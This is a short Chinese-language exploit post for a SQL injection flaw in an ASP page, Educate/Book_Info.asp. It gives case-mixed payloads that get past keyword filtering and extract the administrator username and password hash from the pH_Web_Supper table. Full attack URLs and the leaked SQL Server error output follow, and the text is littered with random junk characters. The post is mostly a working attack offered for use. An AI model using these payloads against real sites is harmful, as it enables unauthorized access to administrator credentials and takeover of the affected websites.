漏洞出现在Educate/Book_Info.asp
) U$ Q( E. g" f5 ^5 F ! z3 S2 g5 i2 o0 a
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ g7 e# t. b( b! L& ?6 N N6 ]
0 g- M" C3 i2 ]& T
exp:如下& e! ~- W: I4 s' }
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
9 r1 Z t3 `# }+ p查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)$ {6 x2 E, t7 S, D
7 l3 v0 m( d/ R. ^http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
, u3 Z4 F3 x. y7 r5 } Z ; A5 t. E+ S9 k, C
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
# D) h. C1 u9 G* Z0 X; Z; K0 _
4 `. ~' v' c6 C9 z, m6 z2 Q/ I+ t将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。0 f- b& E$ O$ Y1 ?! K+ z% N' m( u1 c
3 W3 C4 X. ]8 \$ v/Educate/Book_Info.asp,行 8
! `& Q w; y% B, |- Z& w * k4 a M2 f* a0 O
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) h0 w, w* f+ a2 x0 |7 C
6 F' U$ |# L9 d: s2 C7 _- d) Y( b- _; AMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'# ]" h/ @+ q' l d
$ I7 O6 _& A$ _
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。* s6 x1 }# ~1 \* k1 h
) p k, Y9 t: r* m' V: u/ J/Educate/Book_Info.asp,行 8
; v2 U. p3 T+ G; C& Q$ _ |